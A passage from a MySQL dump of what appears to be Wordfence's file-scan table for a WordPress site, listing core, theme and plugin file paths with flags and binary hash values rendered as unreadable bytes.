E�m','YYw_s簃@	DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('\0HS�\r�Ѐ1X�@','wp-includes/wp-includes/css/dist/block-directory/style.min.css',0,'IF	�1�P�������','IF	�1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),('\n���{�;@	m�=}','wp-includes/wp-includes/images/rss.png',0,'��[�(�.��*NZ�','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('��eJ�\'U9�5�x','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',0,'�V�*��F谯��<��l','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('��L7��v�q���','wp-content/themes/sg-window/sidebar-1-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�~�բvj�;�','\0��&X������L��r͓j.��}Y�b�\0)��','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('G���$�7O�9','wp-content/themes/sg-window/img/icons/small/myspace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"b;DÁ�4���p\n�','[��/��aO񳣃t�\r<ӤQrg����a���','',0,'?'),('R�\\�&��T	�|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��b�Zd��	��','���mA�QW,�?�;��w�FT񎧳\\>��','',0,'?'),('ynm�;�/�UsK	��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I|��lu�D�','�� \r���B�%�F�V}[�j�7CF�A�','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�Kt�Jr�\"�-*�','7�d�i}k�4��+)�[��-L�4�uR_O�<Ѩ�','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�xT-4�ZK��3','�>|k��\\~/n8�	9��i�+vT��[s','',0,'?'),('��`��Em�es�@��','wp-includes/wp-includes/blocks/archives.php',0,'�{��\nP?^��u:�	','�{��\nP?^��u:�	','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('���#��E[���','wp-content/themes/shootingstar/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6x��[Z�v��Q','�3��>�\">�f��k�O�F�mнS�w�','',0,'?'),('����+*��5���\'�','wp-content/themes/sg-window/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��.5JZ�<��{','�IO.�J����o�ޞ&���5�AO�Uq4�','',0,'?'),('��x���;C�QkkR�','wp-includes/wp-includes/class-wp-dependency.php',0,'���NV}��b.\'�5m','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�\"�<	i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('��PC���I徥��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',0,'����v�\rs*�\\�','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;�	m8','',0,'?'),('%�cQ�O�M����','wp-includes/wp-includes/block-patterns/two-images.php',0,'&��_�w?V�:�g��C','&��_�w?V�:�g��C','w@�c|�h�(��Hz�X[�_�:�x��0�)K','',0,'?'),('*ԅt��hEc�W�h^','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php',0,'�ăd��O�[�S\nc\0','�ăd��O�[�S\nc\0','^o�&[�l����2Zg/�?>��P~C��Iȗ','',0,'?'),('L��bP�-I׭1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('{�~��rb�\\B��%�','wp-content/plugins/wordfence/css/dt_table.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('�75V,���hT#�','wp-content/themes/shootingstar/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2*�R�+�n����Ȧ','	R8�	����	����IKOz�L�v�6隤M3�','',0,'?'),('�L��\"�G�ʄ/\nN�','wp-admin/images/privacy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҟ�ݘ���ӽ�}�','qO.���x&��*p���@��l����Β/k','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('��S��)�v�����','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',0,'��e�-{\'B�����Qa','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ץ��Z�3��q��\")�','�iO�G��sՎ��,����`\\]���~5\\','',0,'?'),(' Łq\Z��{��>�d-','wp-content/plugins/wp-cerber/assets/flags/mt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\n�r�CZ2���Y��','X�g�����a�-\0s!�\nZF�>X��\Z','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' P�x\ZX�6?H%�','wp-content/themes/shootingstar/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��I5�d�M�\n�T','�L��%j�:����\nkp]����\nM��J��>','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2#	�3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 1c0�x\n��q\n\Z�!iM','wp-includes/wp-includes/class-wp-oembed-controller.php',0,'\";�r��\Z(FAU','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT�愭��,�;_','��@��q��>G�C�|�U��sC��p���','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' B�p�Q#_ij>bh','wp-includes/wp-includes/Requests/Exception/HTTP/407.php',0,'����v����j&�Ƶ','����v����j&�Ƶ','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),(' H�Ng9�&�o�9','wp-content/themes/shootingstar/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9I�u�����\09','��֢ԝ)R�wX|��ny�0L&1����z��','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�(	ia�Y���(','����%��\Z0b��[u�#�v.�_��	O�=0','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' �cNq̻�\\�ѭ�','wp-includes/wp-includes/css/buttons.css',0,'���[��\\���.�','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),(' ��NJi2�zl�L�(','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',0,'�l�{�bOs�_a��>','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),(' �\r$	Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]A	3�[/Cd���','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ��p��E�4q�&?J�','wp-content/plugins/wp-cerber/assets/flags/im.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),(' ������	f���O','wp-includes/wp-includes/css/wp-pointer-rtl.min.css',0,'���k�d�\\n�Ue�S@','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),(' ���F>����e$+�','wp-includes/wp-includes/js/clipboard.js',0,'Ԓs� 5C�ɚ�b��LF','Ԓs� 5C�ɚ�b��LF','���ʿ�Iv�+>Y�h�b�F\\x��v�.wT','',0,'?'),('!\n�φ\r��\Z<�\\�C�','wp-admin/css/index.php',0,'�������	[','�������	[','N�eI��WbOQ�ܽz�s|+8%V�ؐnظV','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��#�ttIrzX�K','Vo�梌>�)�x����Z���EB�O��','',0,'?'),('!Dxɐ�г��[t�Q�','wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js',0,'��V\\\n]��K�s\'�','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��(j\nX��f�[�9','�{[m�؎�~��6��\n���?�¬QnM6�','',0,'?'),('!����W٤�\"��@�','wp-content/themes/sg-window/img/icons/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�W��bl���G\\2','�@F\"4%�I����g�숦g0������l','',0,'?'),('!��d�p\nH�]�G-��k','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png',0,'�¶��B�=\rz��3j�','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P��$?wZ˧�','¬Y�1�Ys�_q�,����\\��m�Ox�Fc��','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�u$�j�6�uwq�t�','�r\"��(�-w�a$A�2\"�7��\\��Vb�','',0,'?'),('!�����%H�*�<5�','wp-includes/wp-includes/block-supports/typography.php',0,'�w�΁�veY�\Z��f�','�w�΁�veY�\Z��f�','�B��tٯ�@�^���5��N���XȆ<','',0,'?'),('!��⋶��Z]��n-','wp-includes/block-patterns/quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�:�v,^8^����\"�}','����@��]y�%U?�vw�Xl�^�{q�','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���S�):\\l�ID�','��$Xn�{4��aV_`�M,sbݱ�\"�*3��','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!�\\Ϩ��\'� �jn�','wp-includes/wp-includes/css/admin-bar-rtl.min.css',0,'�4�܀	���,玒�[�','�4�܀	���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��Њ�-����^�','���-��z��~�������H��$�L','',0,'?'),('!�Tۦ����	l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�E��jk��Z:q�','�z�+e<OkM�Δ��t���	��q��hW�','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>\"�.\"�A�9�','�ڌ�R��md8@�ig�R���?���?�1�0','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����͡�RI0��[','�Ӆ�_3�:��þAs�N���0*Y�g�5�','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�a6���:)�\n','A`��	�w���D�ܞ�n-����SU7�\Zm','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E	��-N�o����','�L�I‘�™Y�ow�)�4!:�;?��','',0,'?'),('\"(}G��r�	0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6����n+66��n���','\\AY�Q�ۂ�|�?�X�� �n�\Z��P3�L','',0,'?'),('\"N�M�����k�VO','wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<~�{�)����3z','Y�S�6��F7��}ڐ�ք��BI��^�<','',0,'?'),('\"���K�6^�4V�}��','wp-includes/blocks/spacer/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9j5�w�s(�ڱ���I','1�	ib��ǎ�ҫ�&�dV5�ojd\"���2�@��','',0,'?'),('\"����b9��e�|�_�','wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('\"�����u>1�7���','wp-includes/class-pop3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('\"�Z�_Z\0\0���y�','wp-content/plugins/wp-cerber/assets/flags/mu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�1�����($+a�','m� )���5p�PP�:�|X������u��\0j�','',0,'?'),('\"��6\r+K{�\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�$���D��[@o','�X��=e.��>�o�����E�����','',0,'?'),('\"ב��K��W)�','wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css',0,'�M\"7����g��6>','�M\"7����g��6>','WM�����r�0���y7:5э�C<�o����','',0,'?'),('\"�w��h����','wp-admin/includes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ͷ��,?�i�|�','D�]��y�� B�j�&�kK e��1:��’*�','',0,'?'),('\"ۚ+�Ҽ�y�O]f','wp-content/themes/sg-window/img/icons/twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���̓Y�tW�','o\'+㝞��!�q���;,K��wmm�oP�j4_S','',0,'?'),('\"��0�\0�L�\'M��','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('\"�J���2�\rߤ-H�&','wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�r5�:\n���J�','h5L`��}�f�r���J7fA�|	Ǒ�%��','',0,'?'),('\"��1�9�<@�pS�;�','wp-includes/wp-includes/comment-template.php',0,'V��|?�M��=]J��','V��|?�M��=]J��','�4x��������!Gk˙���Lto�!��\'�#','',0,'?'),('#��\'Қ���,\0V','wp-includes/wp-includes/class-wp-customize-setting.php',0,'-j�b�4k2�`�s@','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('#\n��/��PZ~h��','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kC�e;�P����S','��_\'\\q��F0��{�ТF�\r��.�OK','',0,'?'),('#%�[���Z��5���','wp-includes/wp-includes/blocks/paragraph/block.json',0,'A�T;��_Bjf�����','A�T;��_Bjf�����','�Ƈ4pc���[<3iԁv�D������How<','',0,'?'),('#D�ń�����5%��','wp-includes/class-wp-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+%Yj�͑�Q	�^��(','�@I*�۷�����}O�&?����8��q�','',0,'?'),('#W�\n��Y�,!Z��*�','wp-content/plugins/wp-cerber/assets/flags/sn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��-#��9���uQ','i}2��3��&�ܓ��w0��r��wJ,�','',0,'?'),('#^ ̉�Θ!�M�z?{{','wp-content/plugins/wp-cerber/assets/flags/gs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~�\Z7c�o#.','o=b�i�e�U�\Z�N�1>��Vy��..��3Z`�','',0,'?'),('#y���NI��>t���','wp-includes/wp-includes/class-wp-simplepie-file.php',0,'��88A�`�w+��p�T','��88A�`�w+��p�T','�8u]�p�Q_�t�Rۮ]o}e5#�P5b2BU��','',0,'?'),('#y���t(�$NT��t�','wp-includes/Requests/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@k7�\0��t�\\*��G','�w<PB��ZC�k�SI�Q!��\n}i','',0,'?'),('#煽$8f5m�v�5�','wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��ѓ�+��','쏂^�/�A���<�! �Q��!-��2\\','',0,'?'),('#�-g�\\L%3�S݋B#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0	��6�ӭ�Iv����hJ��`����','',0,'?'),('#����cF�N�[��','wp-includes/wp-includes/class-phpass.php',0,'_͂�t��WQ1�aL�','_͂�t��WQ1�aL�','@FY�v�G^\n����}/$O���~;a\0M','',0,'?'),('#̓\\�	����b��X�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',0,'��	��I�ݶ�3��S','��	��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('#�ףqX���-��5','wp-content/themes/sg-window/img/3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eð��\'_D)O��0','g|����W��Fs3�M6:�����M\r4�#v�K','',0,'?'),('#�vk��f���W��','wp-includes/wp-includes/js/mediaelement/wp-playlist.js',0,'�����X�l\"�o�','�����X�l\"�o�','�/=àBAo&���I�1��]k~�N���','',0,'?'),('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('#�S�\"�G9���_`�','wp-includes/wp-includes/images/spinner.gif',0,'�L�\nD�\n�oً�j˲�','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('#�4\n�e�4^&R��{�','wp-content/plugins/wordfence/js/admin.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D���T�B�`����','�\"���w�^s�.�$o�4ʻo���޹��߹T@4','',0,'?'),('$&��A�ÆJ���_!6�','wp-content/plugins/wp-cerber/assets/flags/my.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QG��M� �;k��=�','_PL��0�\0�:��sP㱤��bˆ�G6Ia�','',0,'?'),('$5������^р��','wp-includes/wp-includes/js/plupload/handlers.min.js',0,'T_\'!;��QYЦIk&Q','T_\'!;��QYЦIk&Q','�I��Zh�y8s��Cv����rTVRḾ','',0,'?'),('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�<\0cA�F�L��N','R]`�[��2��#�X��Éi(�E\n`��rJ�','',0,'?'),('$9^�d΋���ڬ�K��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',0,'���j	\r�<l�J�l�','���j	\r�<l�J�l�','[�a6$sp8����Y�Q�\'��1��\0�Dح','',0,'?'),('$<�y�V�`L�\n�e�F','wp-includes/wp-includes/class-wp-block-parser.php',0,'%�}�C�1gGr*� �7','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('$I��ٍ�`�	��:tV','wp-includes/wp-includes/class-wp-meta-query.php',0,'K��C��̚{\"Hp�=','K��C��̚{\"Hp�=','��R�����l��	�n���\\��h����ݢ','',0,'?'),('$N�P��9������','wp-content/plugins/wp-cerber/assets/flags/tn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$Z�,a��8&��1','�E[�\"�-+����Np�m����f��p�+�W�','',0,'?'),('$��W/�\\��.N*','wp-includes/wp-includes/Requests/Exception/HTTP/500.php',0,'����km�\n	H�M��','����km�\n	H�M��','FO���V3\"���������!k�P�','',0,'?'),('$���z\r��D���HP','wp-includes/wp-includes/js/wp-emoji-loader.min.js',0,' #j��2��\'5�!�gM',' #j��2��\'5�!�gM','����϶.�X���po�I3���fY��cMʲ','',0,'?'),('$��::����t����','wp-includes/wp-includes/js/dist/block-library.min.js',0,'`\\{�O�\Z�sl=��','`\\{�O�\Z�sl=��','��Pu6��Qi��D�9ï��_�iZ�G��Ad��','',0,'?'),('$����0S\r�r���','wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('$��S�Ck��d�W�','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7^��њO���i','5Qg��wB��H.f��<�<Zh&�V�','',0,'?'),('$�l����.�)\r���','wp-includes/wp-includes/admin-bar.php',0,'���Y��\'[+�\"�c�W','���Y��\'[+�\"�c�W','J�����xb��ADHM����2������6�M�','',0,'?'),('$���C����/�9��','wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�I�֩�Eu&S^:�9','���t�D�MQ��ҊW8�����&���8','',0,'?'),('$��-#q`�l�$W�ۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�����Ӛ%=Z�&3','�s�R�#bǟy��,�K=�l�!�Ϩ�t��.','',0,'?'),('$��|��c�� \\~��','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^>�5�pa��W��>','���������DC��XG4WFP�#�N�S\Z','',0,'?'),('$��^���6bH^�*��','wp-admin/options-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��q/�ʵ�����4','p�H�	w�h�66]���	�m���E_��','',0,'?'),('$�ϫ/����!��C�','wp-includes/IXR/class-IXR-introspectionserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),('$��\r3��cc�Q�Q','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/doc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��*��z5���','���#ߟꕼ���402���v�:��n{/�\0','',0,'?'),('%\n4s�ch�}�\'����','wp-includes/wp-includes/blocks/spacer/block.json',0,'9j5�w�s(�ڱ���I','9j5�w�s(�ڱ���I','1�	